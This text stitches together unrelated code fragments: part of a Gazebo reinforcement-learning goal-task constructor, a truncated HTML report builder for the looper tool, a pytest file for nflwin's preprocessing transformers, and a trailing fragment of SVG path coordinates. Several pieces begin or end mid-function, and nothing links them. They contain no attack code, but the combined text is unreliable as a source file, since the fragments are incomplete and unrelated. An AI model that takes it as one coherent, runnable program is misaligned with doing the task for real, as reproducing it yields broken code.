switch_goal_within_episode=False,
start_range=0,
increase_range_by_percent=50.,
reward_thresh_to_increase_range=0.4,
percent_full_range_in_curriculum=0.1,
max_reward_q_length=100,
reward_weight=1.0,
move_goal_during_episode=True,
end_episode_after_success=False,
success_with_angle_requirement=True,
additional_observation_list=[],
use_egocentric_states=False,
egocentric_perception_range=0):
"""
Args:
env (gym.Env): an instance of Environment
max_steps (int): episode will end if not reaching gaol in so many steps
goal_name (string): name of the goal in the world
distraction_list (list of string): a list of model. the model shoud be in gazebo database
success_distance_thresh (float): the goal is reached if it's within this distance to the agent
fail_distance_thresh (float): if the agent moves away from the goal more than this distance,
it's considered a failure and is given reward -1
distraction_penalty_distance_thresh (float): if positive, penalize agent getting too close
to distraction objects (objects that are not the goal itself)
distraction_penalty (float): positive float of how much to penalize getting too close to
distraction objects
random_agent_orientation (bool): whether randomize the orientation (yaw) of the agent at the beginning of an
episode.
sparse_reward (bool): if true, the reward is -1/0/1, otherwise the 0 case will be replaced
with normalized distance the agent get closer to goal.
random_range (float): the goal's random position range
polar_coord (bool): use cartesian coordinates in random_range, otherwise, use polar coord.
random_goal (bool): if True, teacher will randomly select goal from the object list each episode
use_curriculum_training (bool): when true, use curriculum in goal task training
curriculum_distractions (bool): move distractions according to curriculum as well
curriculum_target_angle (bool): enlarge angle to target when initializing target according
to curriculum. Only when all angles are satisfied does curriculum try to increase distance.
Uses range of 0-360 degrees, starting from 60 with increments of 20.
switch_goal_within_episode (bool): if random_goal and this are both true, goal will be re-picked
within episode every time target is reached, besides picking after whole episode ends.
start_range (float): for curriculum learning, the starting random_range to set the goal
increase_range_by_percent (float): for curriculum learning, how much to increase random range
every time agent reached the specified amount of reward.
reward_thresh_to_increase_range (float): for curriculum learning, how much reward to reach
before the teacher increases random range.
percent_full_range_in_curriculum (float): if above 0, randomly throw in x% of training examples
where random_range is the full range instead of the easier ones in the curriculum.
max_reward_q_length (int): how many recent rewards to consider when estimating agent accuracy.
reward_weight (float): the weight of the reward, is used in multi-task case
move_goal_during_episode (bool): if True, the goal will be moved during episode, when it has been achieved
end_episode_after_success (bool): if True, the episode will end once the goal is reached. A True value of this
flag will overwrite the effects of flags ``switch_goal_within_episode`` and ``move_goal_during_episode``.
success_with_angle_requirement: if True then calculate the reward considering the angular requirement
additional_observation_list: a list of additonal objects to be added
use_egocentric_states (bool): For the non-image observation case, use the states transformed to
egocentric coordinate, e.g., agent's egocentric distance and direction to goal
egocentric_perception_range (float): the max range in degree to limit the agent's observation.
E.g. 60 means object is only visible when it's within +/-60 degrees in front of the agent's
direction (yaw).
"""
self._max_play_ground_size = 5 # play ground will be (-5, 5) for both x and y axes.
# TODO: Remove the default grey walls in the play ground world file,
# and insert them according to the max_play_ground_size.
# The wall should be lower, and adjustable in length. Add a custom model for that.
super().__init__(
env=env, max_steps=max_steps, reward_weight=reward_weight)
self._goal_name = goal_name
self._success_distance_thresh = success_distance_thresh
self._fail_distance_thresh = fail_distance_thresh
self._distraction_penalty_distance_thresh = distraction_penalty_distance_thresh
if distraction_penalty_distance_thresh > 0:
assert distraction_penalty_distance_thresh < success_distance_thresh
self._distraction_penalty = distraction_penalty
self._sparse_reward = sparse_reward
self._random_agent_orientation = random_agent_orientation
self._use_curriculum_training = use_curriculum_training
self._curriculum_distractions = curriculum_distractions
self._curriculum_target_angle = curriculum_target_angle
self._switch_goal_within_episode = switch_goal_within_episode
if curriculum_target_angle:
self._random_angle = 60
self._start_range = start_range
self._is_full_range_in_curriculum = False
self._random_goal = random_goal
if random_goal and goal_name not in distraction_list:
distraction_list.append(goal_name)
self._distraction_list = distraction_list
self._object_list = distraction_list
if goal_name and goal_name not in distraction_list:
self._object_list.append(goal_name)
self._goals = self._object_list
self._move_goal_during_episode = move_goal_during_episode
self._end_episode_after_success = end_episode_after_success
| |
<gh_stars>10-100
""" Generate HTML reports """
import os
import glob
import pandas as _pd
import logging
import jinja2
import re
import sys
from warnings import warn
from datetime import timedelta
from ._version import __version__ as v
from .const import *
from .processed_project import get_project_outputs
from .utils import get_file_for_project
from peppy.const import *
from eido import read_schema
from copy import copy as cp
_LOGGER = logging.getLogger("looper")
class HTMLReportBuilder(object):
""" Generate HTML summary report for project/samples """
def __init__(self, prj):
"""
The Project defines the instance.
:param Project prj: Project with which to work/operate on
"""
super(HTMLReportBuilder, self).__init__()
self.prj = prj
self.j_env = get_jinja_env()
self.reports_dir = get_file_for_project(self.prj, "reports")
self.index_html_path = get_file_for_project(self.prj, "summary.html")
self.index_html_filename = os.path.basename(self.index_html_path)
self._outdir = self.prj.output_dir
_LOGGER.debug("Reports dir: {}".format(self.reports_dir))
def __call__(self, objs, stats, columns):
""" Do the work of the subcommand/program. """
# Generate HTML report
navbar = self.create_navbar(self.create_navbar_links(
objs=objs, stats=stats,
wd=self._outdir),
self.index_html_filename)
navbar_reports = self.create_navbar(
self.create_navbar_links(
objs=objs, stats=stats, wd=self.reports_dir),
os.path.join("..", self.index_html_filename))
index_html_path = self.create_index_html(
objs, stats, columns, footer=self.create_footer(),
navbar=navbar, navbar_reports=navbar_reports)
return index_html_path
def create_object_parent_html(self, objs, navbar, footer):
"""
Generates a page listing all the project objects with links
to individual object pages
:param pandas.DataFrame objs: project level dataframe containing any reported objects for all samples
:param str navbar: HTML to be included as the navbar in the main summary page
:param str footer: HTML to be included as the footer
:return str: Rendered parent objects HTML file
"""
object_parent_path = os.path.join(self.reports_dir, "objects.html")
if not os.path.exists(os.path.dirname(object_parent_path)):
os.makedirs(os.path.dirname(object_parent_path))
pages = list()
labels = list()
if not objs.empty:
for key in objs['key'].drop_duplicates().sort_values():
page_name = key + ".html"
page_path = os.path.join(self.reports_dir, page_name.replace(' ', '_').lower())
page_relpath = os.path.relpath(page_path, self.reports_dir)
pages.append(page_relpath)
labels.append(key)
template_vars = dict(navbar=navbar, footer=footer, labels=labels, pages=pages, header="Objects")
return render_jinja_template("navbar_list_parent.html", self.j_env, template_vars)
def create_sample_parent_html(self, navbar, footer):
"""
Generates a page listing all the project samples with links
to individual sample pages
:param str navbar: HTML to be included as the navbar in the main summary page
:param str footer: HTML to be included as the footer
:return str: Rendered parent samples HTML file
"""
sample_parent_path = os.path.join(self.reports_dir, "samples.html")
if not os.path.exists(os.path.dirname(sample_parent_path)):
os.makedirs(os.path.dirname(sample_parent_path))
pages = list()
labels = list()
for sample in self.prj.samples:
sample_name = str(sample.sample_name)
sample_dir = os.path.join(
self.prj.results_folder, sample_name)
# Confirm sample directory exists, then build page
if os.path.exists(sample_dir):
page_name = sample_name + ".html"
page_path = os.path.join(self.reports_dir, page_name.replace(' ', '_').lower())
page_relpath = os.path.relpath(page_path, self.reports_dir)
pages.append(page_relpath)
labels.append(sample_name)
template_vars = dict(navbar=navbar, footer=footer, labels=labels, pages=pages, header="Samples")
return render_jinja_template("navbar_list_parent.html", self.j_env, template_vars)
def create_navbar(self, navbar_links, index_html_relpath):
"""
Creates the navbar using the privided links
:param str navbar_links: HTML list of links to be inserted into a navbar
:return str: navbar HTML
"""
template_vars = dict(navbar_links=navbar_links, index_html=index_html_relpath)
return render_jinja_template("navbar.html", self.j_env, template_vars)
def create_footer(self):
"""
Renders the footer from the templates directory
:return str: footer HTML
"""
return render_jinja_template("footer.html", self.j_env, dict(version=v))
def create_navbar_links(self, objs, stats, wd=None, context=None, include_status=True):
"""
Return a string containing the navbar prebuilt html.
Generates links to each page relative to the directory of interest (wd arg) or uses the provided context to
create the paths (context arg)
:param pandas.DataFrame objs: project results dataframe containing
object data
:param list stats[dict] stats: a summary file of pipeline statistics for each
analyzed sample
:param path wd: the working directory of the current HTML page being generated, enables navbar links
relative to page
:param list[str] context: the context the links will be used in.
The sequence of directories to be prepended to the HTML file in the resulting navbar
:param bool include_status: whether the status link should be included in the links set
:return str: navbar links as HTML-formatted string
"""
if wd is None and context is None:
raise ValueError("Either 'wd' (path the links should be relative to) or 'context'"
" (the context for the links) has to be provided.")
status_relpath = _make_relpath(file_name=os.path.join(self.reports_dir, "status.html"), wd=wd, context=context)
objects_relpath = _make_relpath(file_name=os.path.join(self.reports_dir, "objects.html"), wd=wd, context=context)
samples_relpath = _make_relpath(file_name=os.path.join(self.reports_dir, "samples.html"), wd=wd, context=context)
dropdown_keys_objects = None
dropdown_relpaths_objects = None
dropdown_relpaths_samples = None
sample_names = None
if objs is not None and not objs.dropna().empty:
# If the number of objects is 20 or less, use a drop-down menu
if len(objs['key'].drop_duplicates()) <= 20:
dropdown_relpaths_objects, dropdown_keys_objects = \
_get_navbar_dropdown_data_objects(objs=objs, wd=wd, context=context, reports_dir=self.reports_dir)
else:
dropdown_relpaths_objects = objects_relpath
if stats:
if len(stats) <= 20:
dropdown_relpaths_samples, sample_names = \
_get_navbar_dropdown_data_samples(stats=stats, wd=wd, context=context, reports_dir=self.reports_dir)
else:
# Create a menu link to the samples parent page
dropdown_relpaths_samples = samples_relpath
status_page_name = "Status" if include_status else None
template_vars = dict(status_html_page=status_relpath, status_page_name=status_page_name,
dropdown_keys_objects=dropdown_keys_objects, objects_page_name="Objects",
samples_page_name="Samples", objects_html_page=dropdown_relpaths_objects,
samples_html_page=dropdown_relpaths_samples, menu_name_objects="Objects",
menu_name_samples="Samples", sample_names=sample_names, all_samples=samples_relpath,
all_objects=objects_relpath)
return render_jinja_template("navbar_links.html", self.j_env, template_vars)
def create_object_html(self, single_object, navbar, footer):
"""
Generates a page for an individual object type with all of its
plots from each sample
:param pandas.DataFrame single_object: contains reference
information for an individual object type for all samples
:param pandas.DataFrame objs: project level dataframe
containing any reported objects for all samples
:param str navbar: HTML to be included as the navbar in the main summary page
:param str footer: HTML to be included as the footer
"""
# Generate object filename
for key in single_object['key'].drop_duplicates().sort_values():
# even though it's always one element, loop to extract the data
current_name = str(key)
filename = current_name + ".html"
html_page_path = os.path.join(self.reports_dir, filename.replace(' ', '_').lower())
if not os.path.exists(os.path.dirname(html_page_path)):
os.makedirs(os.path.dirname(html_page_path))
links = []
figures = []
warnings = []
for i, row in single_object.iterrows():
# Set the PATH to a page for the sample. Catch any errors.
try:
object_path = os.path.join(self.prj.results_folder, row['sample_name'], row['filename'])
object_relpath = os.path.relpath(object_path, self.reports_dir)
except AttributeError:
err_msg = ("Sample: {} | " + "Missing valid object path for: {}")
# Report the sample that fails, if that information exists
if str(row['sample_name']) and str(row['filename']):
_LOGGER.warning(err_msg.format(row['sample_name'], row['filename']))
else:
_LOGGER.warning(err_msg.format("Unknown sample"))
object_relpath = ""
# Set the PATH to the image/file. Catch any errors.
# Check if the object is an HTML document
if not str(row['anchor_image']).lower().endswith(IMAGE_EXTS):
image_path = object_path
else:
try:
image_path = os.path.join(self.prj.results_folder, row['sample_name'], row['anchor_image'])
except AttributeError:
_LOGGER.warning(str(row))
err_msg = ("Sample: {} | " + "Missing valid image path for: {}")
# Report the sample that fails, if that information exists
if str(row['sample_name']) and str(row['filename']):
_LOGGER.warning(err_msg.format(row['sample_name'], row['filename']))
else:
_LOGGER.warning(err_msg.format("Unknown", "Unknown"))
image_path = ""
# Check for the presence of both the file and thumbnail
if os.path.isfile(image_path) and os.path.isfile(object_path):
image_relpath = os.path.relpath(image_path, self.reports_dir)
# If the object has a valid image, use it!
_LOGGER.debug("Checking image path: {}".format(image_path))
if str(image_path).lower().endswith(IMAGE_EXTS):
figures.append([object_relpath, str(row['sample_name']), image_relpath])
# Or if that "image" is not an image, treat it as a link
elif not str(image_path).lower().endswith(IMAGE_EXTS):
_LOGGER.debug("Got link")
links.append([str(row['sample_name']), image_relpath])
else:
warnings.append(str(row['filename']))
if warnings:
_LOGGER.warning("create_object_html: " +
filename.replace(' ', '_').lower() + " references nonexistent object files")
_LOGGER.debug(filename.replace(' ', '_').lower() +
" nonexistent files: " + ','.join(str(x) for x in warnings))
template_vars = dict(navbar=navbar, footer=footer, name=current_name, figures=figures, links=links)
save_html(html_page_path, render_jinja_template("object.html", self.j_env, args=template_vars))
def create_sample_html(self, objs, sample_name, sample_stats, navbar, footer):
"""
Produce an HTML page containing all of a sample's objects
and the sample summary statistics
:param pandas.DataFrame objs: project level dataframe containing
any reported objects for all samples
:param str sample_name: the name of the current sample
:param dict sample_stats: pipeline run statistics for the current sample
:param str navbar: HTML to be included as the navbar in the main summary page
:param str footer: HTML to be included as the footer
:return str: path to the produced HTML page
"""
html_filename = sample_name + ".html"
html_page = os.path.join(self.reports_dir, html_filename.replace(' ', '_').lower())
sample_page_relpath = os.path.relpath(html_page, self._outdir)
single_sample = _pd.DataFrame() if objs.empty else objs[objs['sample_name'] == sample_name]
if not os.path.exists(os.path.dirname(html_page)):
os.makedirs(os.path.dirname(html_page))
sample_dir = os.path.join(self.prj.results_folder, sample_name)
if os.path.exists(sample_dir):
if single_sample.empty:
# When there is no objects.tsv file, search for the
# presence of log, profile, and command files
log_name = _match_file_for_sample(sample_name, 'log.md', self.prj.results_folder)
profile_name = _match_file_for_sample(sample_name, 'profile.tsv', self.prj.results_folder)
command_name = _match_file_for_sample(sample_name, 'commands.sh', self.prj.results_folder)
else:
log_name = str(single_sample.iloc[0]['annotation']) + "_log.md"
profile_name = str(single_sample.iloc[0]['annotation']) + "_profile.tsv"
command_name = str(single_sample.iloc[0]['annotation']) + "_commands.sh"
stats_name = "stats.tsv"
flag = _get_flags(sample_dir)
# get links to the files
stats_file_path = _get_relpath_to_file(
stats_name, sample_name, self.prj.results_folder, self.reports_dir)
profile_file_path = _get_relpath_to_file(
profile_name, sample_name, self.prj.results_folder, self.reports_dir)
commands_file_path = _get_relpath_to_file(
command_name, sample_name, self.prj.results_folder, self.reports_dir)
log_file_path = _get_relpath_to_file(
| |
<filename>nflwin/tests/test_preprocessing.py
from __future__ import print_function, division
import numpy as np
import pandas as pd
import pytest
from sklearn.utils.validation import NotFittedError
from sklearn.pipeline import Pipeline
from nflwin import preprocessing
class TestPipelines(object):
"""Testing if pipelining cleaning steps works."""
def test_map_to_int_to_onehot(self):
fit_df = pd.DataFrame({"quarter": ["Q1", "Q1", "Q1", "Q2", "Q2"]})
transform_df = fit_df.copy()
mti = preprocessing.MapToInt("quarter", copy=True)
ohe = preprocessing.OneHotEncoderFromDataFrame(categorical_feature_names=["quarter"], copy=True)
pipe = Pipeline(steps=[("one", mti), ("two", ohe)])
pipe.fit(fit_df)
output_df = pipe.transform(transform_df)
expected_df = pd.DataFrame({"onehot_col1": [1.0, 1, 1, 0, 0], "onehot_col2": [0.0, 0, 0, 1, 1]})
pd.util.testing.assert_frame_equal(output_df, expected_df)
class TestComputeElapsedTime(object):
"""Testing if we can properly map quarters and time elapsed to a total time elapsed."""
def test_bad_quarter_colname_produces_error(self):
input_df = pd.DataFrame({"blahblahblah": ["Q1", "Q2", "Q3", "Q4", "OT"],
"time_elapsed": [200, 0, 50, 850, 40]})
cet = preprocessing.ComputeElapsedTime("quarter", "time_elapsed")
cet.fit(input_df)
with pytest.raises(KeyError):
cet.transform(input_df)
def test_bad_time_elapsed_colname_produces_error(self):
input_df = pd.DataFrame({"quarter": ["Q1", "Q2", "Q3", "Q4", "OT"],
"blahblahblah": [200, 0, 50, 850, 40]})
cet = preprocessing.ComputeElapsedTime("quarter", "time_elapsed")
cet.fit(input_df)
with pytest.raises(KeyError):
cet.transform(input_df)
def test_preexisting_output_colname_produces_error(self):
input_df = pd.DataFrame({"quarter": ["Q1", "Q2", "Q3", "Q4", "OT"],
"time_elapsed": [200, 0, 50, 850, 40],
"total_time_elapsed": [0, 0, 0, 0, 0]})
cet = preprocessing.ComputeElapsedTime("quarter", "time_elapsed",
total_time_colname="total_time_elapsed")
cet.fit(input_df)
with pytest.raises(KeyError):
cet.transform(input_df)
def test_incomplete_quarter_mapping(self):
input_df = pd.DataFrame({"quarter": ["Q1", "Q2", "Q3", "Q4", "OT1"],
"time_elapsed": [200, 0, 50, 850, 40]})
cet = preprocessing.ComputeElapsedTime("quarter", "time_elapsed",
quarter_to_second_mapping={
"Q1": 0,
"Q2": 900,
"Q4": 2700,
"OT1":3600} )
cet.fit(input_df)
with pytest.raises(TypeError):
cet.transform(input_df)
def test_simple_working_case(self):
input_df = pd.DataFrame({"quarter": ["Q1", "Q2", "Q3", "Q4", "OT"],
"time_elapsed": [200, 0, 50, 850, 40]})
cet = preprocessing.ComputeElapsedTime("quarter", "time_elapsed")
cet.fit(input_df)
transformed_df = cet.transform(input_df)
expected_df = pd.DataFrame({"quarter": ["Q1", "Q2", "Q3", "Q4", "OT"],
"time_elapsed": [200, 0, 50, 850, 40],
"total_elapsed_time": [200, 900, 1850, 3550, 3640]})
pd.util.testing.assert_frame_equal(transformed_df, expected_df)
def test_inplace_transform(self):
input_df = pd.DataFrame({"quarter": ["Q1", "Q2", "Q3", "Q4", "OT"],
"time_elapsed": [200, 0, 50, 850, 40]})
cet = preprocessing.ComputeElapsedTime("quarter", "time_elapsed", copy=False)
cet.fit(input_df)
cet.transform(input_df)
expected_df = pd.DataFrame({"quarter": ["Q1", "Q2", "Q3", "Q4", "OT"],
"time_elapsed": [200, 0, 50, 850, 40],
"total_elapsed_time": [200, 900, 1850, 3550, 3640]})
pd.util.testing.assert_frame_equal(input_df, expected_df)
def test_custom_mapping(self):
input_df = pd.DataFrame({"quarter": ["quarter1", "Q2", "Q3", "Q4", "OT1"],
"time_elapsed": [200, 0, 50, 850, 40]})
cet = preprocessing.ComputeElapsedTime("quarter", "time_elapsed",
quarter_to_second_mapping={
"quarter1": 0,
"Q2": 500,
"Q3": 1800,
"Q4": 2700,
"OT1":3600})
cet.fit(input_df)
transformed_df = cet.transform(input_df)
expected_df = pd.DataFrame({"quarter": ["quarter1", "Q2", "Q3", "Q4", "OT1"],
"time_elapsed": [200, 0, 50, 850, 40],
"total_elapsed_time": [200, 500, 1850, 3550, 3640]})
pd.util.testing.assert_frame_equal(transformed_df, expected_df)
class TestComputeIfOffenseIsHome(object):
"""Testing if we can correctly compute if the offense is the home team."""
def test_bad_offense_colname_produces_error(self):
input_df = pd.DataFrame({"home_team": ["a", "a", "a"],
"blahblahblah": ["a", "b", "a"]})
ciow = preprocessing.ComputeIfOffenseIsHome("offense_team", "home_team")
ciow.fit(input_df)
with pytest.raises(KeyError):
ciow.transform(input_df)
def test_bad_home_team_colname_produces_error(self):
input_df = pd.DataFrame({"blahblahblah": ["a", "a", "a"],
"offense_team": ["a", "b", "a"]})
ciow = preprocessing.ComputeIfOffenseIsHome("offense_team", "home_team")
ciow.fit(input_df)
with pytest.raises(KeyError):
ciow.transform(input_df)
def test_existing_offense_home_team_colname_produces_error(self):
input_df = pd.DataFrame({"home_team": ["a", "a", "a"],
"offense_team": ["a", "b", "a"]})
ciow = preprocessing.ComputeIfOffenseIsHome("offense_team", "home_team",
offense_home_team_colname="home_team")
ciow.fit(input_df)
with pytest.raises(KeyError):
ciow.transform(input_df)
def test_correct_answer_with_copy(self):
input_df = pd.DataFrame({"home_team": ["a", "a", "a"],
"offense_team": ["a", "b", "a"]})
expected_input_df = input_df.copy()
expected_transformed_df = pd.DataFrame({"home_team": ["a", "a", "a"],
"offense_team": ["a", "b", "a"],
"offense_home_team": [True, False, True]})
ciow = preprocessing.ComputeIfOffenseIsHome("offense_team", "home_team",
offense_home_team_colname="offense_home_team",
copy=True)
transformed_df = ciow.transform(input_df)
pd.util.testing.assert_frame_equal(input_df.sort_index(axis=1), expected_input_df.sort_index(axis=1))
pd.util.testing.assert_frame_equal(transformed_df.sort_index(axis=1), expected_transformed_df.sort_index(axis=1))
def test_correct_answer_without_copy(self):
input_df = pd.DataFrame({"home_team": ["a", "a", "a"],
"offense_team": ["a", "b", "a"]})
expected_transformed_df = pd.DataFrame({"home_team": ["a", "a", "a"],
"offense_team": ["a", "b", "a"],
"offense_home_team": [True, False, True]})
ciow = preprocessing.ComputeIfOffenseIsHome("offense_team", "home_team",
offense_home_team_colname="offense_home_team",
copy=False)
ciow.transform(input_df)
pd.util.testing.assert_frame_equal(input_df.sort_index(axis=1), expected_transformed_df.sort_index(axis=1))
class TestMapToInt(object):
"""Testing if the integer mapper works."""
def test_fit_bad_colname_produces_error(self):
input_df = pd.DataFrame({"one": ["one", "two", "one", "four",
"six", "two", "one", "one"]})
mti = preprocessing.MapToInt("blahblahblah")
with pytest.raises(KeyError):
mti.fit(input_df)
def test_mapping_without_nans(self):
input_df = pd.DataFrame({"one": ["one", "two", "one", "four",
"six", "two", "one", "one"]})
mti = preprocessing.MapToInt("one")
mti.fit(input_df)
expected_output = {"one": 0, "two": 1, "four": 2, "six": 3}
assert mti.mapping == expected_output
def test_mapping_with_nans(self):
input_df = pd.DataFrame({"one": ["one", "two", "one", "four",
"six", np.nan, "one", "one"]})
mti = preprocessing.MapToInt("one")
mti.fit(input_df)
expected_output = {"one": 0, "two": 1, "four": 2, "six": 3}
assert mti.mapping == expected_output
def test_transform_before_fit_produces_error(self):
input_df = pd.DataFrame({"one": ["one", "two", "one", "four",
"six", "two", "one", "one"]})
mti = preprocessing.MapToInt("one")
with pytest.raises(NotFittedError):
mti.transform(input_df)
def test_transform_bad_colname_produces_error(self):
input_df = pd.DataFrame({"one": ["one", "two", "one", "four",
"six", "two", "one", "one"]})
mti = preprocessing.MapToInt("one")
mti.fit(input_df)
transform_df = pd.DataFrame({"blahblahblah": ["one", "two", "one", "four",
"six", "two", "one", "one"]})
with pytest.raises(KeyError):
mti.transform(transform_df)
def test_transform_without_nans(self):
input_df = pd.DataFrame({"one": ["one", "two", "one", "four",
"six", "two", "one", "one"]})
mti = preprocessing.MapToInt("one")
mti.fit(input_df)
transformed_df = mti.transform(input_df)
expected_df = pd.DataFrame({"one": [0, 1, 0, 2, 3, 1, 0, 0]})
pd.util.testing.assert_frame_equal(transformed_df, expected_df)
def test_transform_with_nans(self):
input_df = pd.DataFrame({"one": ["one", "two", "one", "four",
"six", "two", np.nan, "one"]})
mti = preprocessing.MapToInt("one")
mti.fit(input_df)
transformed_df = mti.transform(input_df)
expected_df = pd.DataFrame({"one": [0, 1, 0, 2, 3, 1, np.nan, 0]})
pd.util.testing.assert_frame_equal(transformed_df, expected_df)
def test_transform_inplace(self):
input_df = pd.DataFrame({"one": ["one", "two", "one", "four",
"six", "two", "one", "one"]})
mti = preprocessing.MapToInt("one", copy=False)
mti.fit(input_df)
mti.transform(input_df)
expected_df = pd.DataFrame({"one": [0, 1, 0, 2, 3, 1, 0, 0]})
pd.util.testing.assert_frame_equal(input_df, expected_df)
def test_transform_copy(self):
input_df = pd.DataFrame({"one": ["one", "two", "one", "four",
"six", "two", "one", "one"]})
expected_df = input_df.copy()
mti = preprocessing.MapToInt("one", copy=True)
mti.fit(input_df)
transformed_data = mti.transform(input_df)
pd.util.testing.assert_frame_equal(input_df, expected_df)
class TestOneHotEncoderFromDataFrame(object):
"""Testing if the one-hot encoder wrapper works."""
def setup_method(self, method):
self.data = pd.DataFrame({"one": [1, 2, 3, 1],
"two": [2, 2, 2, 5],
"three": [0, 5, 0, 5]})
self.data = self.data[["one", "two", "three"]]
def test_correct_dtype_passed(self):
ohe = preprocessing.OneHotEncoderFromDataFrame(dtype=np.int)
assert ohe.dtype == np.int
def test_correct_handle_unknown_string_passed(self):
ohe = preprocessing.OneHotEncoderFromDataFrame(handle_unknown="ignore")
assert ohe.handle_unknown == "ignore"
def test_encode_all_columns(self):
ohe = preprocessing.OneHotEncoderFromDataFrame(categorical_feature_names="all")
ohe.fit(self.data)
transformed_data = ohe.transform(self.data)
expected_data = pd.DataFrame({"onehot_col1": [1., 0, 0, 1],
"onehot_col2": [0., 1, 0, 0],
"onehot_col3": [0., 0, 1, 0],
"onehot_col4": [1., 1, 1, 0],
"onehot_col5": [0., 0, 0, 1],
"onehot_col6": [1., 0, 1, 0],
"onehot_col7": [0., 1, 0, 1]})
pd.util.testing.assert_frame_equal(transformed_data.sort_index(axis=1),
expected_data.sort_index(axis=1))
def test_encode_some_columns(self):
ohe = preprocessing.OneHotEncoderFromDataFrame(categorical_feature_names=["one", "three"])
ohe.fit(self.data)
transformed_data = ohe.transform(self.data)
expected_data = pd.DataFrame({"two": [2, 2, 2, 5],
"onehot_col1": [1., 0, 0, 1],
"onehot_col2": [0., 1, 0, 0],
"onehot_col3": [0., 0, 1, 0],
"onehot_col4": [1., 0, 1, 0],
"onehot_col5": [0., 1, 0, 1]})
pd.util.testing.assert_frame_equal(transformed_data.sort_index(axis=1),
expected_data.sort_index(axis=1))
def test_copy_data_works(self):
ohe = preprocessing.OneHotEncoderFromDataFrame(categorical_feature_names=["one", "three"],
copy=True)
ohe.fit(self.data)
transformed_data = ohe.transform(self.data)
expected_data = pd.DataFrame({"one": [1, 2, 3, 1],
"two": [2, 2, 2, 5],
"three": [0, 5, 0, 5]})
pd.util.testing.assert_frame_equal(self.data.sort_index(axis=1),
expected_data.sort_index(axis=1))
def test_inplace_transform_works(self):
ohe = preprocessing.OneHotEncoderFromDataFrame(categorical_feature_names=["one", "three"],
copy=False)
data = self.data.copy()
ohe.fit(self.data)
ohe.transform(self.data)
expected_data = pd.DataFrame({"two": [2, 2, 2, 5],
"onehot_col1": [1., 0, 0, 1],
"onehot_col2": [0., 1, 0, 0],
"onehot_col3": [0., 0, 1, 0],
"onehot_col4": [1., 0, 1, 0],
"onehot_col5": [0., 1, 0, 1]})
pd.util.testing.assert_frame_equal(self.data.sort_index(axis=1),
expected_data.sort_index(axis=1))
def test_encoding_subset_columns(self):
ohe = preprocessing.OneHotEncoderFromDataFrame(categorical_feature_names=["one", "three"],
copy=True)
shifted_data = self.data[2:]
ohe.fit(shifted_data)
transformed_data = ohe.transform(shifted_data)
self.data = pd.DataFrame({"one": [1, 2, 3, 1],
"two": [2, 2, 2, 5],
"three": [0, 5, 0, 5]})
expected_data = pd.DataFrame({"two": [2, 5],
"onehot_col1": [0., 1],
"onehot_col2": [1., 0],
"onehot_col3": [1., 0],
"onehot_col4": [0., 1]},
index=[2, 3])
print(transformed_data)
print(expected_data)
pd.util.testing.assert_frame_equal(transformed_data.sort_index(axis=1),
expected_data.sort_index(axis=1))
class TestCreateScoreDifferential(object):
"""Testing if score differentials are properly created."""
def test_bad_home_score_colname(self):
csd = preprocessing.CreateScoreDifferential("badcol", "away_score", "offense_home")
data = pd.DataFrame({"home_score": [1, 2, 3, 4],
"away_score": [10, 0, 5, 15],
"offense_home": [True, True, True, True]})
with pytest.raises(KeyError):
csd.transform(data)
def test_bad_away_score_colname(self):
csd = preprocessing.CreateScoreDifferential("home_score", "badcol", "offense_home")
data = pd.DataFrame({"home_score": [1, 2, 3, 4],
"away_score": [10, 0, 5, 15],
"offense_home": [True, True, True, True]})
with pytest.raises(KeyError):
csd.fit(data)
csd.transform(data)
def test_bad_offense_home_colname(self):
csd = preprocessing.CreateScoreDifferential("home_score", "away_score", "badcol")
data = pd.DataFrame({"home_score": [1, 2, 3, 4],
"away_score": [10, 0, 5, 15],
"offense_home": [True, True, True, True]})
with pytest.raises(KeyError):
csd.fit(data)
csd.transform(data)
def test_differential_column_already_exists(self):
csd = preprocessing.CreateScoreDifferential("home_score",
"away_score",
"offense_home",
score_differential_colname="used_col")
data = pd.DataFrame({"home_score": [1, 2, 3, 4],
"away_score": [10, 0, 5, 15],
"offense_home": [True, True, True, True],
"used_col": [0, 0, 0, 0]})
with pytest.raises(KeyError):
csd.fit(data)
csd.transform(data)
def test_differential_works_offense_is_home(self):
csd = preprocessing.CreateScoreDifferential("home_score",
"away_score",
"offense_home",
score_differential_colname="score_diff")
input_data = pd.DataFrame({"home_score": [1, 2, 3, 4],
"away_score": [10, 0, 5, 15],
"offense_home": [True, True, True, True]})
expected_data = pd.DataFrame({"home_score": [1, 2, 3, 4],
"away_score": [10, 0, 5, 15],
"offense_home": [True, True, True, True],
"score_diff": [-9, 2, -2, -11]})
csd.fit(input_data)
transformed_data = csd.transform(input_data)
pd.util.testing.assert_frame_equal(expected_data.sort_index(axis=1),
transformed_data.sort_index(axis=1))
def test_differential_works_offense_is_away(self):
csd = preprocessing.CreateScoreDifferential("home_score",
"away_score",
"offense_home",
score_differential_colname="score_diff")
input_data = pd.DataFrame({"home_score": [1, 2, 3, 4],
"away_score": [10, 0, 5, 15],
"offense_home": [False, False, False, False]})
expected_data = pd.DataFrame({"home_score": [1, 2, 3, 4],
"away_score": [10, 0, 5, 15],
"offense_home": [False, False, False, False],
"score_diff": [9, -2, 2, 11]})
csd.fit(input_data)
| |
2.09\
546C2.81988 2.80\
969 1.98679 3.82\
485 1.49482 5.01\
257C1.00285 6.20\
029 0.874083 7.5\
0719 1.12489 8.7\
6807C1.37569 10.\
0289 1.99478 11.\
1872 2.90382 12.\
0962C3.81286 13.\
0052 4.97107 13.\
6243 6.23194 13.\
8751C7.49282 14.\
1259 8.79972 13.\
9972 9.98744 13.\
5052C11.1752 13.\
0133 12.1903 12.\
1801 12.9045 11.\
1112C13.6188 10.\
0423 14 8.78558 \
14 7.5C14 5.7760\
9 13.3152 4.1228\
12.0962 2.90381\
C10.8772 1.68482\
9.22392 1 7.500\
01 1ZM7.50001 13\
C6.41221 13 5.34\
881 12.6775 4.44\
434 12.0731C3.53\
987 11.4688 2.83\
493 10.6097 2.41\
865 9.60474C2.00\
237 8.59974 1.89\
344 7.4939 2.105\
66 6.427C2.31788\
5.36011 2.84172\
4.38015 3.61091\
3.61096C4.3801 \
2.84177 5.36012 \
2.31793 6.42701 \
2.10571C7.49391 \
1.89349 8.59975 \
2.00242 9.60474 \
2.4187C10.6097 2\
.83498 11.4687 3\
.53987 12.0731 4\
.44434C12.6774 5\
.34881 13 6.4122\
13 7.5C13 8.958\
69 12.4206 10.35\
76 11.3891 11.38\
9C10.3577 12.420\
5 8.9587 13 7.50\
001 13ZM9.04999 \
4.57994C8.87722 \
4.40004 8.6697 4\
.25723 8.44 4.16\
